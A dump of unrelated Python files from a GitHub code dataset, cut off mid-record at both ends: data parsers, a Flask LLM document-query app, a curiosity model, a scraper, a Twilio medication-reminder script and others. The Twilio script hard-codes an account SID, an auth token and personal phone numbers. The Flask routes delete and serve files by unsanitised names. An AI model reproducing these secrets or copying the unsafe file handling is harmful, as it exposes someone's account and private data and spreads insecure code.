print(\"\\n\".join(file_list_failed))\r\n","repo_name":"junebug12851/Sims4ScriptingBPProj","sub_path":"sync_packages.py","file_name":"sync_packages.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"29907643577","text":"#!/usr/bin/env python3\nimport sys\nimport re\nimport os\nimport statistics\n\ndef parseFile(path,printresult=False):\n result = {}\n with open(path, 'r') as file:\n #remove three lines\n header = file.readline()\n header = file.readline()\n header = file.readline()\n\n\n time = 0\n sum_swapin = 0\n sum_swapout = 0\n while True:\n line = file.readline().strip()\n line = re.split(\"\\ +\", line)\n\n if line[-2] != \"0.00\" or line[-1] != \"0.00\":\n break\n while len(line) != 1 or line[0] != '':\n time += 1\n sum_swapin += float(line[-2])\n sum_swapout += float(line[-1])\n line = file.readline().strip()\n line = re.split(\"\\ +\", line)\n filename = path.split('_')\n\n result[\"bench\"] = filename[0]\n result[\"system\"] = filename[2]\n result[\"size\"] = filename[1]\n result[\"run\"] = filename[3]\n result[\"runtime\"] = time\n result[\"swapin\"] = sum_swapin\n result[\"swapout\"] = sum_swapout\n if printresult:\n print(\"{},{},{},{},{},{:.2f},{:.2f}\".format(filename[0],filename[2],filename[1],filename[3], time, sum_swapin/1000, sum_swapout/1000))\n return result\n \ndef printCurr(c):\n if \"bench\" in c:\n if len(c[\"swapin\"]) == 1:\n print(\"{},{},{},{:.2f},0,{:.2f},0\".format(c[\"bench\"], c[\"system\"], c[\"size\"], \n statistics.mean(c[\"swapin\"])/1000,\n statistics.mean(c[\"swapout\"])/1000))\n else:\n print(\"{},{},{},{:.2f},{:.2f},{:.2f},{:.2f}\".format(c[\"bench\"], c[\"system\"], c[\"size\"], \n statistics.mean(c[\"swapin\"])/1000, statistics.stdev(c[\"swapin\"])/1000,\n statistics.mean(c[\"swapout\"])/1000, statistics.stdev(c[\"swapout\"])/1000))\n\nif len(sys.argv) == 2:\n parseFile(sys.argv[1], True)\n exit()\nelif len(sys.argv) != 1:\n print(\"Wrong input\")\n exit()\n\n\ncurr = {}\nfor x in sorted(os.listdir()):\n if x.endswith(\"swap.txt\"):\n ret = parseFile(x)\n if \"bench\" not in curr or curr[\"bench\"] != ret[\"bench\"] or curr[\"system\"] != ret[\"system\"] or curr[\"size\"] != ret[\"size\"]:\n printCurr(curr)\n curr[\"bench\"] = ret[\"bench\"]\n curr[\"system\"] = ret[\"system\"]\n curr[\"size\"] = ret[\"size\"]\n curr[\"swapin\"] = []\n curr[\"swapout\"] = []\n curr[\"swapin\"].append(ret[\"swapin\"])\n curr[\"swapout\"].append(ret[\"swapout\"])\nprintCurr(curr)\n","repo_name":"oscarlab/mosaic-asplos23-artifacts","sub_path":"2-linux-mosaic/vmfiles/scripts/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"28916007533","text":"import os\nfrom flask import Blueprint\nfrom flask import flash, request, redirect, url_for, render_template, send_from_directory\nfrom werkzeug.utils import secure_filename\nfrom src.logic.process_query_LLM import *\nfrom src.model.JsonTools import write_json, read_json\n\n#Global variables\nUPLOAD_FOLDER = 'store'\nALLOWED_EXTENSIONS = {'pdf'}\nTAGS_PROMPS_DB = 'promps.json'\nquery_answer_tuple_list = []\ndb=None\n\nmain_bp = Blueprint('main', __name__)\n\n@main_bp.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if 
file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n joinPath = build_file_path(filename)\n create_directory_if_it_doesnot_exist(joinPath)\n file.save(joinPath)\n return redirect(url_for('main.dir_listing'))\n return render_template('load_form_super.html')\n\n@main_bp.route('/about')\ndef about_page():\n return render_template('about.html')\n\n\n#File\n\n@main_bp.route('/files', methods=['GET'])\ndef dir_listing():\n abs_path = os.path.join(UPLOAD_FOLDER, '')\n extension_file = \".pdf\"\n pdf_files = get_files_in_subdir(abs_path, extension_file)\n return render_template('files.html', files = pdf_files)\n\n@main_bp.route('/files/<name>')\ndef download_file(name):\n joinPath = build_file_path(name)\n path = os.path.join( '../', os.path.dirname(joinPath))\n return send_from_directory(path, name)\n\n@main_bp.route('/process/<name>', methods=['GET', 'POST'])\ndef process_file(name):\n joinPath = build_file_path(name)\n process_query_LLM(joinPath)\n return redirect(url_for('main.upload_file'))\n\n@main_bp.route('/consult/<name>', methods=['GET', 'POST'])\ndef consult_file(name):\n global db, query_answer_tuple_list\n db = build_the_database(name)\n query_answer_tuple_list = []\n return redirect(url_for('main.make_query_form'))\n\ndef build_the_database(name):\n joinPath = build_file_path(name)\n return consult_query_LLM(joinPath)\n\n@main_bp.route('/delete/<name>', methods=['GET', 'POST'])\ndef delete_file(name):\n joinPath = build_file_path(name)\n remove_file_path(joinPath)\n return redirect(url_for('main.dir_listing'))\n\n#Query process\n\n@main_bp.route('/query_form')\ndef make_query_form():\n global db\n if not db:\n return\n return render_template('query.html')\n\n@main_bp.route('/query/', methods=['GET', 'POST'])\ndef query():\n global db\n if not db:\n return\n if request.method == 'POST':\n query = request.form['query']\n answer = send_query_to_OpenAI(db, query)\n else:\n answer = 'no answer!!!'\n return process_answer(query, answer)\n\n@main_bp.route(\"/redirect\", methods=[\"POST\"])\ndef redirect_to_new_page():\n return redirect(url_for(\"main.make_query_form\"))\n\n@main_bp.route(\"/multiple-docs-query\", methods=['POST'])\ndef handle_data():\n global db\n my_json = request.get_json()\n files = my_json['files']\n # do something with the data...\n for file in files:\n temp_db = build_the_database(file)\n if not db:\n db = temp_db\n else:\n db.merge_from(temp_db)\n return \"Done!\"\n\n#Promps process\n@main_bp.route('/newpromps/<promps>', methods=['POST'])\ndef new_promps_form(promps):\n return render_template('new_promps.html', promps = promps)\n\n@main_bp.route('/save-promps', methods=['GET', 'POST'])\ndef save_promps():\n if request.method == 'POST':\n tags = request.form['tags']\n promps = request.form['promps']\n save_tags_and_promps_in_json(tags, promps)\n global query_answer_tuple_list\n return render_template('answer.html', query_answer_tuple_list = query_answer_tuple_list)\n\n\n#Promps list page\n\n@main_bp.route('/promps')\ndef promps_list():\n tags_promps_db = os.path.join(UPLOAD_FOLDER, TAGS_PROMPS_DB)\n data_list = read_json(tags_promps_db)\n tuple_list = [(d['tags'], d['promps']) for d in data_list]\n return render_template('promps_list.html', promps = tuple_list)\n\n@main_bp.route('/promps/<query>', methods=['GET', 'POST'])\ndef promps_query(query):\n global db\n if not db:\n return\n answer = send_query_to_OpenAI(db, query)\n return process_answer(query, answer)\n\n#Commond\n\ndef 
process_answer(query, answer):\n global query_answer_tuple_list\n query_answer_tuple_list.append((query, answer))\n return render_template('answer.html', query_answer_tuple_list = query_answer_tuple_list)\n\n#Tools\ndef build_file_path(filename):\n return os.path.join(UPLOAD_FOLDER, cleanFilename(filename), filename)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n#Controlers\n\nimport shutil\ndef remove_file_path(path_file_name):\n if os.path.exists(path_file_name):\n shutil.rmtree(os.path.dirname(path_file_name))\n\ndef save_tags_and_promps_in_json(tags, promps):\n tags_promps_db = os.path.join(UPLOAD_FOLDER, TAGS_PROMPS_DB)\n data = read_json(tags_promps_db)\n new_item = {\"tags\": tags, \"promps\": promps}\n data.append(new_item)\n write_json(tags_promps_db, data)","repo_name":"yosbel-penate/SemanticSearchLangChaing","sub_path":"app/router/main_routes.py","file_name":"main_routes.py","file_ext":"py","file_size_in_byte":5402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28611222374","text":"from model import *\nfrom model.weighting import *\n\nterm_doc_dict = {\"1\":{\"Hello\":1, \"World\":0, \"Python\":1},\n \"2\":{\"Hello\":1, \"World\":1, \"Python\":1},\n \"3\":{\"Hello\":2, \"World\":0, \"Python\":3}}\n\nterm_q_dict = {\"Hello\":1, \"World\":0, \"Python\":1}\n\nweight_doc = Weighting_Doc()\nweight_q = Weighting_Query()\n\nprint(weight_doc.tf_idf(term_doc_dict))\nprint(weight_q.tf_idf(term_q_dict, term_doc_dict))\n","repo_name":"chnpat/ir-backend","sub_path":"unitTest.py","file_name":"unitTest.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75187660213","text":"# Derived from https://github.com/chagmgang/pytorch_ppo_rl/blob/master/model.py\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport math\nfrom torch.nn import init\nfrom gymnasium.spaces import Box, Discrete\n\nclass ICMModel(nn.Module):\n def __init__(self, input_size, feature_size, hidden_size, output_size, action_space=None):\n super(ICMModel, self).__init__()\n\n if type(input_size) == int or len(input_size) == 1:\n self.image=False\n self.input_size = input_size if type(input_size) == int else input_size[0]\n else:\n self.image=True\n self.input_size = input_size\n self.feature_size = feature_size\n self.hidden_size = hidden_size\n self.output_size = output_size \n self.action_space = action_space\n\n if self.image:\n self.feature = nn.Sequential(\n nn.Conv2d(\n in_channels=input_size[2],\n out_channels=32,\n kernel_size=8,\n stride=4),\n nn.LeakyReLU(),\n nn.BatchNorm2d(num_features=32),\n nn.Conv2d(\n in_channels=32,\n out_channels=64,\n kernel_size=4,\n stride=2),\n nn.LeakyReLU(),\n nn.BatchNorm2d(num_features=64),\n nn.Conv2d(\n in_channels=64,\n out_channels=64,\n kernel_size=3,\n stride=1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(num_features=64),\n nn.Flatten(start_dim=1),\n nn.Linear(\n 7 * 7 * 64,\n self.feature_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(num_features=self.feature_size),\n )\n else:\n self.feature = nn.Sequential(\n nn.Linear(self.input_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(num_features=self.hidden_size),\n nn.Linear(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.BatchNorm1d(num_features=self.hidden_size),\n nn.Linear(self.hidden_size, 
self.feature_size),\n nn.BatchNorm1d(num_features=self.feature_size),\n # large scale study didn't use an activation here \n )\n\n self.inverse_model = nn.Sequential(\n nn.Linear(self.feature_size * 2, self.hidden_size),\n nn.ReLU(),\n nn.Linear(self.hidden_size, hidden_size),\n nn.ReLU(),\n nn.Linear(self.hidden_size, output_size),\n # large scale study didn't use an activation on features, inverse, or forward \n # https://github.com/openai/large-scale-curiosity/blob/master/auxiliary_tasks.py\n )\n\n self.forward_model = nn.Sequential(\n nn.Linear(output_size + self.feature_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.Linear(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(),\n nn.Linear(self.hidden_size, self.feature_size),\n # nn.Tanh(),\n\n )\n\n for p in self.modules():\n if isinstance(p, nn.Conv2d):\n init.kaiming_uniform_(p.weight)\n p.bias.data.zero_()\n\n if isinstance(p, nn.Linear):\n init.kaiming_uniform_(p.weight, a=1.0)\n p.bias.data.zero_()\n\n def forward(self, inputs, train=True):\n state, next_state, action = inputs\n if self.image:\n state = torch.permute(state, (0, 3, 1, 2)).float()\n next_state = torch.permute(next_state, (0, 3, 1, 2)).float()\n if isinstance(self.action_space, Discrete): \n if len(action.shape)>1:\n action = action.squeeze()\n action = torch.nn.functional.one_hot(action, self.action_space.n).float()\n encode_state = self.feature(state)\n encode_next_state = self.feature(next_state)\n if train:\n pred_action = torch.cat((encode_state, encode_next_state), 1) \n pred_action = self.inverse_model(pred_action)\n else:\n pred_action = None\n\n # ---------------------\n \n # get pred next state\n pred_next_state_feature = torch.cat((encode_state, action), 1)\n pred_next_state_feature = self.forward_model(pred_next_state_feature)\n\n real_next_state_feature = encode_next_state\n return real_next_state_feature, pred_next_state_feature, pred_action","repo_name":"act3-ace/Curious-POET","sub_path":"cpoet/central_icm/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31745559264","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2017-04-18 17:02:55\r\n# @Author : hbyandy (hbyandy@yeah.net)\r\n# @Link : \r\n# @Version : $Id$\r\n\r\nfrom os import path\r\nimport logging\r\nimport logging.config\r\nimport asyncio,os,json,time\r\nfrom datetime import datetime\r\nfrom aiohttp import web\r\n\r\nlog_file_path = path.join(path.dirname(path.abspath(__file__)),'conf', 'logging.config')\r\nlogging.config.fileConfig(log_file_path)\r\napp_logger = logging.getLogger(\"TEST_LOGGER\")\r\n\r\ndef index(request):\r\n\treturn web.Response(body = '
<h1>Awesome</h1>
')\r\n\r\nasync def init(loop):\r\n\tapp = web.Application(loop = loop)\r\n\tapp.router.add_route('GET','/',index)\r\n\tserver = await loop.create_server(app.make_handler(),'127.0.0.1',9000)\r\n\tlogging.info('server started at http://127.0.0.1:9000...')\r\n\treturn server\r\n\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(init(loop))\r\nloop.run_forever()","repo_name":"hbyandy/python_learn","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19593693999","text":"def main():\n for i in range(1,11):\n file = 'logs/property' + str(i) + '_summary.txt'\n lines = open(file, 'r')\n\n print('########################\\n')\n print('Prop {}'.format(i))\n\n verified = 0\n falsified = 0\n timeout = 0\n time = 0\n\n for line in lines:\n data = line.split(', ')\n time = time + int(data[2])\n\n if data[1] == 'SAT':\n falsified = falsified + 1\n elif data[1] == 'UNSAT':\n verified = verified + 1\n elif data[1] == 'TIMEOUT':\n timeout = timeout + 1\n else:\n raise ValueError()\n\n time = round(time / 1000)\n min = int(time / 60)\n sec = time - 60 * min\n\n print('Verified = {}'.format(verified))\n print('Falsified = {}'.format(falsified))\n print('Timeout = {}'.format(timeout))\n print('Time = {}m{}s'.format(min, sec))\n\n print('\\n########################')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"longph1989/Socrates","sub_path":"exp-results/reluplex/parse_results.py","file_name":"parse_results.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"}
+{"seq_id":"7364537227","text":"from mysqlconnection import connectToMySQL\n\nclass Users:\n def __init__(self,data):\n self.id = data[\"id\"]\n self.first_name = data[\"first_name\"]\n self.last_name = data[\"last_name\"]\n self.email = data[\"email\"]\n self.created_at = data[\"created_at\"]\n self.updated_at = data[\"updated_at\"]\n\n\n @classmethod\n def insert_new(cls,data):\n query = \"INSERT INTO users (first_name, last_name, email) VALUES (%(first_name)s, %(last_name)s, %(email)s)\"\n return connectToMySQL(\"users_schema\").query_db(query,data)\n\n @classmethod\n def read_all(cls):\n query = \"SELECT * FROM users ORDER BY id DESC\"\n db_users = connectToMySQL(\"users_schema\").query_db(query)\n users = []\n\n for u in db_users:\n users.append(Users(u))\n \n return users","repo_name":"Inxie/Python","sub_path":"Flask_MySQL/crud/users_cr/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27499977912","text":"# def l100kmtompg(litros):\n# galones = litros / 3.785411784\n# millas = 100 * 1000 / 1609.344\n# return millas / galones\n \n# def mpgtol100km(millas):\n# km100 = millas * 1609.344 / 1000 / 100\n# litros = 3.785411784\n# return litros / km100\n\n\n# print(l100kmtompg(3.9))\n# print(l100kmtompg(7.5))\n# print(l100kmtompg(10.))\n# print(mpgtol100km(60.3))\n# print(mpgtol100km(31.4))\n# print(mpgtol100km(23.5))\n\ngrupo = {}\n\nwhile True:\n nombre = input(\"Enter the student's name (or exit to stop): \")\n if nombre == 'exit':\n break\n \n calif = int(input(\"Enter the student's grade (0-10): \"))\n \n if nombre in grupo:\n grupo[nombre] += (calif,) # {'Erik': (10, 7, 4)}\n else:\n grupo[nombre] = 
(calif,)\n\nprint(grupo)","repo_name":"xErik444x/apuntesPython","sub_path":"codes/Parte1/millasakilometrosycosas.py","file_name":"millasakilometrosycosas.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"964112536","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n\n# Adjust the scraping so that it only gets regular season games\ndef get_schedule(year):\n schedule = []\n\n url = 'https://www.baseball-reference.com/leagues/MLB/' + str(year) + '-schedule.shtml'\n schedule_page = requests.get(url)\n\n soup = BeautifulSoup(schedule_page.text, 'html.parser')\n games = soup.find_all(class_='game')\n\n for game in games:\n if game.find('span') != None:\n continue\n teams = game.find_all('a')\n away_team = teams[0].text\n home_team = teams[1].text\n\n schedule.append((away_team, home_team))\n\n return (year, schedule)\n\n\n# will take some doing...\n# need the correct values for attributes of a Player class\n# and need to aggregate them to the correct team in a list\n# sort by top 9 batters\n\ndef get_player_batting_df(year):\n\n abbreviations = {\n 'ARI': \"Arizona D'Backs\",\n 'ATL': 'Atlanta Braves',\n 'BAL': 'Baltimore Orioles',\n 'BOS': 'Boston Red Sox',\n 'CHC': 'Chicago Cubs',\n 'CHW': 'Chicago White Sox',\n 'CIN': 'Cincinnati Reds',\n 'CLE': 'Cleveland Indians',\n 'COL': 'Colorado Rockies',\n 'DET': 'Detroit Tigers',\n 'HOU': 'Houston Astros',\n 'KCR': 'Kansas City Royals',\n 'LAA': 'Los Angeles Angels',\n 'LAD': 'Los Angeles Dodgers',\n 'MIA': 'Miami Marlins',\n 'MIL': 'Milwaukee Brewers',\n 'MIN': 'Minnesota Twins',\n 'NYM': 'New York Mets',\n 'NYY': 'New York Yankees',\n 'OAK': 'Oakland Athletics',\n 'PHI': 'Philadelphia Phillies',\n 'PIT': 'Pittsburgh Pirates',\n 'SDP': 'San Diego Padres',\n 'SEA': 'Seattle Mariners',\n 'SFG': 'San Francisco Giants',\n 'STL': 'St. 
Louis Cardinals',\n 'TBR': 'Tampa Bay Rays',\n 'TEX': 'Texas Rangers',\n 'TOR': 'Toronto Blue Jays',\n 'WSN': 'Washington Nationals'\n }\n\n # Get the player data from web scraper\n # df = pd.DataFrame()\n #\n # url = 'https://www.baseball-reference.com/leagues/MLB/' + str(year) + '-standard-batting.shtml'\n # batting_page = requests.get(url)\n #\n # session = HTMLSession()\n # r = session.get(url)\n # r.html.render(retries=1)\n #\n # soup = BeautifulSoup(r.html.text, 'html.parser')\n #\n # print(soup)\n\n\n\n\n df = pd.read_csv('C:/Users/Wideet/Desktop/MLB_Data/' + str(year) + '_batting.csv')\n # Let's assume we got everything....\n\n # Preprocess to more easily aggregate to team rosters\n df['Team Name'] = df['Tm'].apply(lambda x: abbreviations[x] if x in abbreviations else None)\n # drop the id suffix and strip the '*'/'#' flags from each name\n df['Name'] = df['Name'].apply(lambda x: x.split('\\\\')[0].replace('*', '').replace('#', ''))\n\n roster_indices = list(df.groupby('Tm')['PA'].nlargest(9).reset_index()['level_1'].values)\n roster_df = df.iloc[roster_indices]\n roster_df = roster_df[roster_df['Tm'].isin(abbreviations)]\n\n return roster_df\n\nget_player_batting_df(2018)\n\n\n","repo_name":"wideet/mlb_project","sub_path":"scripts/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3459372592","text":"\nimport json\n\n\nclass University(object):\n def __init__(self):\n with open(\"base_university.json\", \"r\") as read_file:\n data = json.load(read_file)\n self.countOfStudents = data['countOfStudents']\n self.ourEducationPlan = data['ourEducationPlan']\n self.internetCost = data['internetCost']\n self.accountantSalary = data['accountantSalary']\n self.cost1C = data['cost1C']\n self.sysAdminSalary = data['sysAdminSalary']\n self.methodistSalary = data['methodistSalary']\n self.inflation = data['inflation']\n self.durationOfEducation = data['durationOfEducation']\n self.lectorSalaryPerHour = data['lectorSalaryPerHour']\n\n\n def printMe(self):\n print(self.countOfStudents)\n\n\nclass Offline(University):\n def __init__(self):\n super().__init__()\n with open(\"offline_university.json\", \"r\") as read_file:\n data = json.load(read_file)\n self.costOfPlace = data['costOfPlace']\n self.securitySalary = data['securitySalary']\n self.cloakroomSalary = data['cloakroomSalary']\n self.updateProjectors = data['updateProjectors']\n self.chancelleryCost = data['chancelleryCost']\n self.paperCost = data['paperCost']\n self.salaryOfCleaner = data['salaryOfCleaner']\n\n\nclass Online(University):\n def __init__(self):\n super().__init__()\n with open(\"online_university.json\", \"r\") as read_file:\n data = json.load(read_file)\n self.elearningHost = data['elearningHost']\n self.zoomAccounts = data['zoomAccounts']\n self.cloudRent = data['cloudRent']\n\n","repo_name":"James-Bolt/Computer_graphics_task_1","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"4406578079","text":"import os\nimport numpy as np\nfrom Applications.kmeans.kmeansfunctions import HistoryMean, CalculateDistanceD, CalculateCenterListD, \\\n CalculateCenterListDQ, CalculateDistanceDQ\nfrom CutAndExport.Histogram import HistogramWithMinMaxList\n\n#################################################################\nk = 32\nenergy = \"1500\"\nreadfileName = 
\"FT0\"\n\n#################################################################\nos.chdir(\"../../\")\ndim = 12\n\nfor n in range(0, 21):\n data = np.loadtxt(\"_DataFolder/kmeans/cs/csq/{1}-{0}-{2}.csv\".format(energy, readfileName, n), delimiter=',')\n kmeansData = np.loadtxt(\"_DataFolder/kmeans/kmeans/csq/{1}-{0}-{2}-all.csv\".format(energy, readfileName, n), delimiter=',').astype(int)\n distanceAll = []\n for i in range(0, len(kmeansData)):\n centersAll = CalculateCenterListDQ(data, kmeansData[i], k)\n distanceAll.append(CalculateDistanceDQ(data, kmeansData[i], centersAll))\n distanceAllArray = np.array(distanceAll)\n allMean = np.mean(distanceAllArray, axis=0)\n np.savetxt(\"_DataFolder/kmeans/distances/csq/{1}-{0}-{2}-meandist.csv\".format(energy, readfileName, n), allMean, delimiter=',', fmt='%f')\n res1 = HistogramWithMinMaxList(allMean, [2000, 20000], 50)\n print(res1.listCount)\n","repo_name":"NBAlexis/MLAnalysis","sub_path":"Applications/kmeans/qktodistance.py","file_name":"qktodistance.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29038811238","text":"import os\nfrom twilio.rest import Client\nimport sched, time\nimport schedule\n\n\nhostPhoneNumber = \"+12246287287\"\nsafteyPhoneNumber = \"+17038191285\"\n# Your Account Sid and Auth Token from twilio.com/console\n# and set the environment variables. See http://twil.io/secure\naccount_sid = 'AC76ba72e79d8e3665d3bd460d944d77d7'\nauth_token = '99717eabde4883558063829e8bd27b11'\nclient = Client(account_sid, auth_token)\n\n\ndef testPhoneNumber(phone_number):\n if len(phone_number) == 10:\n phone_number = \"+1\" + phone_number\n return True\n else: \n return False\n \noptiInNumbers = [\"6188895954\", \"6188895458\"]\nprint(optiInNumbers)\n\ndef confirmationThatMessagesWentOut():\n alertMessage = client.messages \\\n .create( \n body= \"The message went out!\",\n from_= hostPhoneNumber,\n to= safteyPhoneNumber\n )\n\ndef alert_User(phone_number, Name_of_Medication):\n if testPhoneNumber(phone_number):\n alertMessage = client.messages \\\n .create( \n body= \"This is a reminder for you to take your \" + Name_of_Medication + \" medication\",\n from_= hostPhoneNumber,\n to= phone_number\n )\n confirmationThatMessagesWentOut()\n else : \n print(\"there was an error with the phone number\")\n\n\ndef enroll_Patient():\n for number in optiInNumbers:\n if testPhoneNumber(number):\n alertMessage = client.messages \\\n .create( \n body= \"This is an alert that you will be receiving text alerts to take you medication\",\n from_= hostPhoneNumber,\n to= number\n )\n else: \n print(\"there was an error with the phone number\")\n\n\n\ndef settupTime(interval, date , time):\n switch()\n# for number in optiInNumbers:\n# schedule.every(5).seconds.do(alert_User,number,\"advil\")\n \n\n# operator to run the commands\n# enroll_Patient()\n\nschedule.every().day.at(\"08:00\").do(alert_User,\"6188895954\",\"Atorvastatin\")\nschedule.every().day.at(\"08:00\").do(alert_User,\"6188895954\",\"Blood Pressure Medication \")\nschedule.every().day.at(\"08:00\").do(alert_User,\"6188895458\",\"Atorvastatin\")\nschedule.every().day.at(\"16:00\").do(alert_User,\"6182970223\",\"Caffeine + AM Meds\")\n# need to be added once Pardeep sends me the info \nschedule.every().day.at(\"16:00\").do(alert_User,\"618512\",\"Caffeine + AM Meds\")\nschedule.every().day.at(\"16:00\").do(alert_User,\"6182970223\",\"Caffeine + AM Meds\")\n\nwhile True:\n schedule.run_pending()\n 
time.sleep(1)\n","repo_name":"vrainuncensored/adhere","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"70432244213","text":"from distutils.core import setup\r\n\r\nREQUIRED_PACKAGES = [\r\n \"pandas>=1.3.5\"\r\n]\r\n\r\n\r\nsetup(\r\n name='secure_dataframe', # How you named your package folder (MyLib)\r\n packages=['secure_dataframe'], # Choose the same as \"name\"\r\n version='0.0.9', # Start with a small number and increase it with every change you make\r\n license='MIT', # Choose a license from here: https://help.github.com/articles/licensing-a-repository\r\n description='A way to secure and filter dataframe on pandas', # Give a short description about your library\r\n author='Pedro Pinho', # Type in your name\r\n author_email='pepeupepeo@gmail.com', # Type in your E-Mail\r\n url='https://github.com/Grayfados/SecureDataframe', # Provide either the link to your github or to your website\r\n download_url=\"https://github.com/Grayfados/SecureDataframe/archive/refs/tags/v0.0.2.tar.gz\",\r\n install_requires=REQUIRED_PACKAGES,\r\n classifiers=[\r\n 'Development Status :: 3 - Alpha', # Choose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\r\n 'Intended Audience :: Developers', # Define that your audience are developers\r\n 'Environment :: Plugins',\r\n 'License :: OSI Approved :: MIT License', # Again, pick a license\r\n 'Programming Language :: Python :: 3.7',\r\n 'Programming Language :: Python :: 3.8',\r\n 'Programming Language :: Python :: 3.9',\r\n ],\r\n)\r\n","repo_name":"Grayfados/SecureDataframe","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71948508212","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 12 23:57:09 2018\n\n@author: arfas\n\"\"\"\n\nimport numpy as np\n\npy1=0.33\npy2=0.67 \n\nm1=[[5.01],[3.42]] \nm2=[[6.26],[2.87]] \n\nm1=np.array(m1) \nm2=np.array(m2) \n\ncm1=[[0.122, 0.098],[0.098, 0.142]] \ncm1=np.array(cm1) \ncm2=[[0.435, 0.121],[0.121, 0.110]] \ncm2=np.array(cm2) \n\nmodcm1=np.linalg.det(cm1) \nmodcm2=np.linalg.det(cm2) \n\nxt=[[6.75],[4.25]] \nxt=np.array(xt) \n\nmtsub1=np.subtract(xt, m1) \nmtsub2=np.subtract(xt, m2) \n\n\nf1=((1/((np.sqrt(2*np.pi))*np.power(modcm1, (1/2))))*(np.exp(-((np.matmul(np.matmul(mtsub1.transpose(), (1/cm1)), mtsub1))/2))))\nf2=((1/((np.sqrt(2*np.pi))*np.power(modcm2, (1/2))))*(np.exp(-((np.matmul(np.matmul(mtsub2.transpose(), (1/cm2)), mtsub2))/2))))\n\n#calculates posterior probability for class c1\nPpop1= (f1*py1)/((f1*py1)+(f2*py2))\n\n#calculates posterior probability for class c2\nPpop2= (f2*py2)/((f1*py1)+(f2*py2))","repo_name":"arfas/Machine-Learning","sub_path":"untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"15936808471","text":"\nimport numpy as np\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.platform import test\nclass ProtoTest(test.TestCase):\n def _testLargeProto(self):\n a = constant_op.constant(np.zeros([1024, 1024, 17]))\n gdef = a.op.graph.as_graph_def()\n serialized = gdef.SerializeToString()\n unserialized = ops.Graph().as_graph_def()\n 
unserialized.ParseFromString(serialized)\n self.assertProtoEquals(unserialized, gdef)\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/proto_test.py.transformed.py","file_name":"proto_test.py.transformed.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40086867284","text":"import cv2\nimport numpy as np\n\nimg1 = cv2.imread('../Img/stitching/dog_a.jpg', cv2.IMREAD_COLOR)\nimg2 = cv2.imread('../Img/stitching/dog_b.jpg', cv2.IMREAD_COLOR)\n\nimg1 = cv2.resize(img1, dsize=(1024, 768))\nimg2 = cv2.resize(img2, dsize=(1024, 768))\nimg_list = [img1, img2]\n\nprev_pts = None\nprev_gray_frame = None\ntracks = None\nidx = 0\n\nwhile True:\n if len(img_list)-1 < idx:\n idx = 0\n\n frame = img_list[idx].copy()\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n if prev_pts is not None:\n pts, status, 